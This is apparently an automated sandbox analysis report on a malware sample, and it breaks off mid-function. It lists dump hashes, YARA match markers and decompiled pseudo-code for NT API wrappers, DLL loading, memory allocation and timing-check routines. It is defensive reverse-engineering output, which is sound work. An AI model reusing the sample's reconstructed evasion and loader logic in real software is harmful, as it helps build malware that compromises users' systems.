                                          • Instruction ID: 9901acbadb3c2377b0d15d3c690137acdc3a3e81473fbb304a8ab60332f832b5
                                          • Opcode Fuzzy Hash: ad99596602e12da9576368e929d5ba400b4cbd51d22e50a3b73fd56d8a508c83
                                          • Instruction Fuzzy Hash: 65112C71E116199BDB08CFAAD9406DEFBF7ABC8310F14C13AD508A7214EB305A418F91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.272409804.0000000007D50000.00000040.00000001.sdmp, Offset: 07D50000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7c93872e408628b10ea6d8052c32155e6ecdb496e039fb5bac76b7961ac0265e
                                          • Instruction ID: 05d18eaa31050aabb99ce8a55abfa694e57f53988481b9b9f8eda08cac70ec6f
                                          • Opcode Fuzzy Hash: 7c93872e408628b10ea6d8052c32155e6ecdb496e039fb5bac76b7961ac0265e
                                          • Instruction Fuzzy Hash: 96212CB0E156598BEB48CF6AC94069EFFF3AFC9200F18C16AD508E7254DB744A06CF51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.272409804.0000000007D50000.00000040.00000001.sdmp, Offset: 07D50000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2ca0aae64f9452c5b5a1d2652d2f9a923bfb56d72d2778d0dd576e225fc21811
                                          • Instruction ID: a7e4d090d68f3a4398488b3831eeb7a34e2726246e787a76d23764051f3e7985
                                          • Opcode Fuzzy Hash: 2ca0aae64f9452c5b5a1d2652d2f9a923bfb56d72d2778d0dd576e225fc21811
                                          • Instruction Fuzzy Hash: 6F21D8B1E056598BEB08CF6BC84169EFBF3AFC8200F08C07AD808A6264EB3405468F51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Executed Functions

                                          C-Code - Quality: 37%
                                          			E00419E0A(void* __eax, void* __ebx, intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
                                          				void* _v1957338735;
                                          				void* _t22;
                                          				void* _t33;
                                          				intOrPtr* _t34;
                                          				void* _t36;
                                          
                                          				_t17 = _a4;
                                          				_t34 = _a4 + 0xc48;
                                          				E0041A960(_t17, _t34,  *((intOrPtr*)(_t17 + 0x10)), 0, 0x2a);
                                          				_t9 =  &_a32; // 0x414d42
                                          				_t15 =  &_a8; // 0x414d42
                                          				_t22 =  *((intOrPtr*)( *_t34))( *_t15, _a12, _a16, _a20, _a24, _a28,  *_t9, _a36, _a40, _t33, _t36); // executed
                                          				return _t22;
                                          			}









                                          APIs
                                          • NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 00419E55
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.305959053.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

                                          C-Code - Quality: 37%
                                          			E00419E10(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
                                          				void* _t18;
                                          				intOrPtr* _t27;
                                          
                                          				_t13 = _a4;
                                          				_t27 = _a4 + 0xc48;
                                          				E0041A960(_t13, _t27,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                          				_t6 =  &_a32; // 0x414d42
                                          				_t12 =  &_a8; // 0x414d42
                                          				_t18 =  *((intOrPtr*)( *_t27))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
                                          				return _t18;
                                          			}






                                          APIs
                                          • NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 00419E55
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.305959053.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

                                          C-Code - Quality: 100%
                                          			E0040ACD0(void* __eflags, void* _a4, intOrPtr _a8) {
                                          				char* _v8;
                                          				struct _EXCEPTION_RECORD _v12;
                                          				struct _OBJDIR_INFORMATION _v16;
                                          				char _v536;
                                          				void* _t15;
                                          				struct _OBJDIR_INFORMATION _t17;
                                          				struct _OBJDIR_INFORMATION _t18;
                                          				void* _t30;
                                          				void* _t31;
                                          				void* _t32;
                                          
                                          				_v8 =  &_v536;
                                          				_t15 = E0041C650( &_v12, 0x104, _a8);
                                          				_t31 = _t30 + 0xc;
                                          				if(_t15 != 0) {
                                          					_t17 = E0041CA70(__eflags, _v8);
                                          					_t32 = _t31 + 4;
                                          					__eflags = _t17;
                                          					if(_t17 != 0) {
                                          						E0041CCF0( &_v12, 0);
                                          						_t32 = _t32 + 8;
                                          					}
                                          					_t18 = E0041AEA0(_v8);
                                          					_v16 = _t18;
                                          					__eflags = _t18;
                                          					if(_t18 == 0) {
                                          						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                          						return _v16;
                                          					}
                                          					return _t18;
                                          				} else {
                                          					return _t15;
                                          				}
                                          			}














                                          APIs
                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD42
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.305959053.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

                                          C-Code - Quality: 100%
                                          			E00419D60(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                          				long _t21;
                                          
                                          				_t3 = _a4 + 0xc40; // 0xc40
                                          				E0041A960(_a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                          				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                          				return _t21;
                                          			}





                                          APIs
                                          • NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419DAD
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.305959053.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

                                          C-Code - Quality: 79%
                                          			E00419D5A(void* __ecx, HANDLE* _a4, long _a8, struct _EXCEPTION_RECORD _a12, struct _ERESOURCE_LITE _a16, struct _GUID _a20, long _a24, long _a28, long _a32, long _a36, void* _a40, long _a44) {
                                          				intOrPtr _v0;
                                          				long _t24;
                                          
                                          				_push(ss);
                                          				_t18 = _v0;
                                          				_t6 = _t18 + 0xc40; // 0xc40
                                          				E0041A960(_v0, _t6,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x28);
                                          				_t24 = NtCreateFile(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44); // executed
                                          				return _t24;
                                          			}





                                          APIs
                                          • NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419DAD
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.305959053.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: 6a0c39184f7e5fd1fc2845491a7248b2d38221021d85c167b55cd5b0030cf1ab
                                          • Instruction ID: a054a498a2bccc3ead52e42c922fd4237275239113e9f204a50acda0bc429d50
                                          • Opcode Fuzzy Hash: 6a0c39184f7e5fd1fc2845491a7248b2d38221021d85c167b55cd5b0030cf1ab
                                          • Instruction Fuzzy Hash: 7FF0B2B2211108AFDB08CF88DC95EEB77BDAF8C754F15865DBA0DA7251C630E851CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 64%
                                          			E00419F3A(void* __eax, void* __edx, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                          				long _t15;
                                          
                                          				asm("fisubr word [edi]");
                                          				asm("adc edx, [ebp-0x75]");
                                          				_t11 = _a4;
                                          				_t3 = _t11 + 0xc60; // 0xca0
                                          				E0041A960(_a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                          				_t15 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                          				return _t15;
                                          			}




                                          APIs
                                          • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB34,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 00419F79
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.305959053.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateMemoryVirtual
                                          • String ID:
                                          • API String ID: 2167126740-0
                                          • Opcode ID: 44186a94b7b44cc78959bb0b1b738d4e941b018e41f81d8c4be29ae8b6588199
                                          • Instruction ID: cdea02d43095d62648b7b3e248ff3d7b2981ffa0efe7d8dc4f0a016c044e4a78
                                          • Opcode Fuzzy Hash: 44186a94b7b44cc78959bb0b1b738d4e941b018e41f81d8c4be29ae8b6588199
                                          • Instruction Fuzzy Hash: 67F058B2200108AFDB14DF99CC81EEB77AAFF88750F158208FA4DA7241C630E851CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00419F40(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                          				long _t14;
                                          
                                          				_t3 = _a4 + 0xc60; // 0xca0
                                          				E0041A960(_a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                          				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                          				return _t14;
                                          			}




                                          APIs
                                          • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB34,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 00419F79
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.305959053.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateMemoryVirtual
                                          • String ID:
                                          • API String ID: 2167126740-0
                                          • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                          • Instruction ID: 9c08e1581e5817f7e91e4b21b7a397560e598f802d56d9274a49c90b7c070efe
                                          • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                          • Instruction Fuzzy Hash: 1EF015B2210208ABCB14DF89CC81EEB77ADEF88754F158549BE08A7241C630F810CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 82%
                                          			E00419E90(void* __esi, intOrPtr _a4, void* _a8) {
                                          				long _t8;
                                          
                                          				_t5 = _a4;
                                          				_t2 = _t5 + 0x10; // 0x300
                                          				_t3 = _t5 + 0xc50; // 0x40a923
                                          				E0041A960(_a4, _t3,  *_t2, 0, 0x2c);
                                          				_t8 = NtClose(_a8);
                                          				asm("rcr byte [esi+0x5d], 1");
                                          				return _t8;
                                          			}




                                          APIs
                                          • NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 00419EB5
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.305959053.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: Close
                                          • String ID:
                                          • API String ID: 3535843008-0
                                          • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                          • Instruction ID: e68336ecf97fcbff1cce52d5eab911d0c0d253976a6ab71543f56f2ca0e2158f
                                          • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                          • Instruction Fuzzy Hash: 6CD012752002146BD710EB99CC85ED7776CEF44760F154459BA5C5B242C530F55086E0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: dd47d7c6ff9d2967746e5dbd451d40e03d01ea8ebd275c0750facd0dfd7e8d3f
                                          • Instruction ID: 9c977de8e498fddf620cab440f10a8c14ce3dbc7f66f137b128d0b4a7d9e86fe
                                          • Opcode Fuzzy Hash: dd47d7c6ff9d2967746e5dbd451d40e03d01ea8ebd275c0750facd0dfd7e8d3f
                                          • Instruction Fuzzy Hash: FD900261B0100902D201715A4404616100A97D0381F91C032A1015555FCE658992F171
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: bac412cc1dfe713b9de87026e7e6a89df14211377423f6cc97373e64437bba18
                                          • Instruction ID: 9acea7047c9ce534738556313e3de75183f71b05966573b9287cc56cbd04eb0b
                                          • Opcode Fuzzy Hash: bac412cc1dfe713b9de87026e7e6a89df14211377423f6cc97373e64437bba18
                                          • Instruction Fuzzy Hash: 2C90027170100813D211615A4504707100997D0381F91C422A0415558EDA968952F161
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: afd11a986fd75c76d5f2d470c17d4eb29bae97ee1fb367dd95169c25b93e4d55
                                          • Instruction ID: b3140bf9d755b01c7184775adb463ac860d5039c652b6b3739495c669a65c018
                                          • Opcode Fuzzy Hash: afd11a986fd75c76d5f2d470c17d4eb29bae97ee1fb367dd95169c25b93e4d55
                                          • Instruction Fuzzy Hash: 0D900261742045529645B15A44045075006A7E0381791C022A1405950DC9669856F661
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 0dcfe0ebd91c8ee1dc12afdb7abf5c4e429660d19212ce4a94d03e85e3dfd99b
                                          • Instruction ID: 69058d5e6e63e0ae3b03ccc44cf1429085394c903245383be6a5cc4205c68f66
                                          • Opcode Fuzzy Hash: 0dcfe0ebd91c8ee1dc12afdb7abf5c4e429660d19212ce4a94d03e85e3dfd99b
                                          • Instruction Fuzzy Hash: 8D9002A1702004038205715A4414616500A97E0341B51C031E1005590EC9658891B165
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 3b5dadc4a9406aa96a9bc3ab5a8fa43e16982621262e9db7e601447abd804d1a
                                          • Instruction ID: d2ebbb9f7d992a8a6d6ebca30b791b51954625e087c4805e5c6387704afe9670
                                          • Opcode Fuzzy Hash: 3b5dadc4a9406aa96a9bc3ab5a8fa43e16982621262e9db7e601447abd804d1a
                                          • Instruction Fuzzy Hash: B99002A174100842D200615A4414B061005D7E1341F51C025E1055554ECA59CC52B166
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 1e2b5b332bf1258a1298d0c35329e6e3510c06b412279769b08ccc75d647cef8
                                          • Instruction ID: 4b62ffd29c6225820d73440e3a015218c83c1011b8c38f970a82e0b3cd82e1f4
                                          • Opcode Fuzzy Hash: 1e2b5b332bf1258a1298d0c35329e6e3510c06b412279769b08ccc75d647cef8
                                          • Instruction Fuzzy Hash: 61900265711004034205A55A0704507104697D5391351C031F1006550DDA618861B161
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: ec7c149e61107a3496ffd884b669a85d508fcb993016f245105f29f54d05b7d4
                                          • Instruction ID: b7667a0f31afc59a84206bc139d811d5b9992506d5bc7413a236c7836deed88e
                                          • Opcode Fuzzy Hash: ec7c149e61107a3496ffd884b669a85d508fcb993016f245105f29f54d05b7d4
                                          • Instruction Fuzzy Hash: A49002B170100802D240715A4404746100597D0341F51C021A5055554FCA998DD5B6A5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 640603656618f03567329130a61111bd16e2247b6296fb543ddbeecd273d7c2b
                                          • Instruction ID: f785a899da0dfd0d7d06cb0fd14676072549c8e3f42a93ca2592413ccf5b622b
                                          • Opcode Fuzzy Hash: 640603656618f03567329130a61111bd16e2247b6296fb543ddbeecd273d7c2b
                                          • Instruction Fuzzy Hash: 3990027170108C02D210615A840474A100597D0341F55C421A4415658ECAD58891B161
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 2ec1e25016675323297d7366fdef22abaaa63167c7271e7dc850ae1c7be19574
                                          • Instruction ID: 47df8a1eee954c183b5fc413518c09b73ee94209ec7fb908501affe82e7ca2de
                                          • Opcode Fuzzy Hash: 2ec1e25016675323297d7366fdef22abaaa63167c7271e7dc850ae1c7be19574
                                          • Instruction Fuzzy Hash: 4B90027170100C02D280715A440464A100597D1341F91C025A0016654ECE558A59B7E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: f9c51aca9d722eb434e0b98e87d4fdd0f49f3cbce497cd88ed2ebba9e131c2e5
                                          • Instruction ID: 71747927172317c530f959060f74489a338b672a147d66fdbe459349008bd736
                                          • Opcode Fuzzy Hash: f9c51aca9d722eb434e0b98e87d4fdd0f49f3cbce497cd88ed2ebba9e131c2e5
                                          • Instruction Fuzzy Hash: 3F90026171180442D300656A4C14B07100597D0343F51C125A0145554DCD558861B561
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 6f8b6829a34d0d24e53c7338691213a7612cec61382ba46894ab394736f9cfc8
                                          • Instruction ID: a5b7fdfbf5fe604543a6035d0846ead01ef6ebb354cddd2546d43bce3afd04e9
                                          • Opcode Fuzzy Hash: 6f8b6829a34d0d24e53c7338691213a7612cec61382ba46894ab394736f9cfc8
                                          • Instruction Fuzzy Hash: 50900261B01004428240716A88449065005BBE1351751C131A0989550EC9998865B6A5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 75fa17a14488ca16ddcce2173ddb7a6671609e2dddc6cbed5d49b08f8326cf4f
                                          • Instruction ID: ec0fc32fd1758fcfc06d114b7a01a9978fd27d36b9ed3de1b09a3d94747e602b
                                          • Opcode Fuzzy Hash: 75fa17a14488ca16ddcce2173ddb7a6671609e2dddc6cbed5d49b08f8326cf4f
                                          • Instruction Fuzzy Hash: 8C90027170140802D200615A481470B100597D0342F51C021A1155555ECA658851B5B1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 6cedfc1307578da3b9919c04cc85eded077195f47547435950739ae0eab00c03
                                          • Instruction ID: 84325468cd8d61f69f06fd40c0e515d5296b6df9a57ccb872a40655d4eb8463c
                                          • Opcode Fuzzy Hash: 6cedfc1307578da3b9919c04cc85eded077195f47547435950739ae0eab00c03
                                          • Instruction Fuzzy Hash: C990026170100403D240715A54186065005E7E1341F51D021E0405554DDD558856B262
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 65ad7666882c8d6a65adca0cf8aa83097a1f605ddd692decfdb8639539b4f39e
                                          • Instruction ID: ca98572dbb5bca2050e8513b41c34cdd8552882dd027c8cad3b9dbdb67136c2c
                                          • Opcode Fuzzy Hash: 65ad7666882c8d6a65adca0cf8aa83097a1f605ddd692decfdb8639539b4f39e
                                          • Instruction Fuzzy Hash: F290026971300402D280715A540860A100597D1342F91D425A0006558DCD558869B361
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 060e5310e39ab54be55905ba40a5f481b07da8e08f55c899d0e91078118bd49e
                                          • Instruction ID: 03d4135600f890d824602031901dd738e11053023965e03d5ec6fbe1cdc7b215
                                          • Opcode Fuzzy Hash: 060e5310e39ab54be55905ba40a5f481b07da8e08f55c899d0e91078118bd49e
                                          • Instruction Fuzzy Hash: EA90027170100802D200659A5408646100597E0341F51D021A5015555FCAA58891B171
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 93%
                                          			E00409A90(char* __edx, intOrPtr* _a4) {
                                          				intOrPtr _v8;
                                          				char _v24;
                                          				char _v284;
                                          				char _v804;
                                          				char _v840;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* _t24;
                                          				void* _t31;
                                          				void* _t33;
                                          				void* _t34;
                                          				void* _t39;
                                          				void* _t51;
                                          				intOrPtr* _t53;
                                          				void* _t54;
                                          				void* _t55;
                                          				void* _t56;
                                          				void* _t57;
                                          
                                          				_t53 = _a4;
                                          				_t39 = 0; // executed
                                          				_t24 = E00407E80(__edx, _t53,  &_v24); // executed
                                          				_t55 = _t54 + 8;
                                          				if(_t24 != 0) {
                                          					E00408090( &_v24,  &_v840);
                                          					_t56 = _t55 + 8;
                                          					do {
                                          						E0041B810( &_v284, 0x104);
                                          						E0041BE80( &_v284,  &_v804);
                                          						_t57 = _t56 + 0x10;
                                          						_t51 = 0x4f;
                                          						while(1) {
                                          							_t31 = E00414DC0(E00414D60(_t53, _t51),  &_v284);
                                          							_t57 = _t57 + 0x10;
                                          							if(_t31 != 0) {
                                          								break;
                                          							}
                                          							_t51 = _t51 + 1;
                                          							if(_t51 <= 0x62) {
                                          								continue;
                                          							} else {
                                          							}
                                          							goto L8;
                                          						}
                                          						_t9 = _t53 + 0x14; // 0xffffe045
                                          						 *(_t53 + 0x474) =  *(_t53 + 0x474) ^  *_t9;
                                          						_t39 = 1;
                                          						L8:
                                          						_t33 = E004080C0(_t39, _t51,  &_v24,  &_v840);
                                          						_t56 = _t57 + 8;
                                          					} while (_t33 != 0 && _t39 == 0);
                                          					_t34 = E00408140(_t53,  &_v24); // executed
                                          					if(_t39 == 0) {
                                          						asm("rdtsc");
                                          						asm("rdtsc");
                                          						_v8 = _t34 - 0 + _t34;
                                          						 *((intOrPtr*)(_t53 + 0x55c)) =  *((intOrPtr*)(_t53 + 0x55c)) + 0xffffffba;
                                          					}
                                          					 *((intOrPtr*)(_t53 + 0x31)) =  *((intOrPtr*)(_t53 + 0x31)) + _t39;
                                          					_t20 = _t53 + 0x31; // 0x5608758b
                                          					 *((intOrPtr*)(_t53 + 0x32)) =  *((intOrPtr*)(_t53 + 0x32)) +  *_t20 + 1;
                                          					return 1;
                                          				} else {
                                          					return _t24;
                                          				}
                                          			}






















                                          Memory Dump Source
                                          • Source File: 00000005.00000002.305959053.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 44%
                                          			E0041A0A2(int _a4) {
                                          				intOrPtr _v0;
                                          				void* _t8;
                                          				void* _t14;
                                          				void* _t17;
                                          				void* _t19;
                                          
                                          				asm("loopne 0xffffffe8");
                                          				 *((intOrPtr*)(_t8 + _t19)) =  *((intOrPtr*)(_t8 + _t19)) - _t14;
                                          				_t17 = _t8;
                                          				asm("ror dword [esp+esi+0x18211356], 0x55");
                                          				_push(_t19);
                                          				_t10 = _v0;
                                          				_push(_t17);
                                          				E0041A960(_v0, _v0 + 0xc7c,  *((intOrPtr*)(_t10 + 0xa14)), 0, 0x36);
                                          				ExitProcess(_a4);
                                          			}









                                          APIs
                                          • RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A09D
                                          • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A0D8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.305959053.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: ExitFreeHeapProcess
                                          • String ID: U
                                          • API String ID: 1180424539-3372436214
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 75%
                                          			E004082E8(void* __eax, signed int __ecx, long _a8) {
                                          				char _v63;
                                          				char _v64;
                                          				void* _t15;
                                          				int _t16;
                                          				long _t24;
                                          				int _t29;
                                          				void* _t31;
                                          				void* _t33;
                                          				void* _t35;
                                          				signed int _t41;
                                          
                                          				_t35 = _t31;
                                          				_pop(_t32);
                                          				_t1 = __ecx + 0x55;
                                          				 *_t1 =  *(__ecx + 0x55) << __ecx;
                                          				_t41 =  *_t1;
                                          				_t33 = _t35;
                                          				_v64 = 0;
                                          				E0041B860( &_v63, 0, 0x3f);
                                          				E0041C400( &_v64, 3);
                                          				_t15 = E0040ACD0(_t41, _a8 + 0x1c,  &_v64); // executed
                                          				_t16 = E00414E20(_a8 + 0x1c, _t15, 0, 0, 0xc4e7b6d6);
                                          				_t29 = _t16;
                                          				if(_t29 != 0) {
                                          					_t24 = _a8;
                                          					_t16 = PostThreadMessageW(_t24, 0x111, 0, 0); // executed
                                          					_t43 = _t16;
                                          					if(_t16 == 0) {
                                          						_t16 =  *_t29(_t24, 0x8003, _t33 + (E0040A460(_t43, 1, 8) & 0x000000ff) - 0x40, _t16);
                                          					}
                                          				}
                                          				return _t16;
                                          			}














                                          APIs
                                          • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.305959053.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID:
                                          • API String ID: 1836367815-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 82%
                                          			E004082F0(void* __eflags, intOrPtr _a4, long _a8) {
                                          				char _v67;
                                          				char _v68;
                                          				void* _t12;
                                          				intOrPtr* _t13;
                                          				int _t14;
                                          				long _t21;
                                          				intOrPtr* _t25;
                                          				void* _t26;
                                          				void* _t30;
                                          
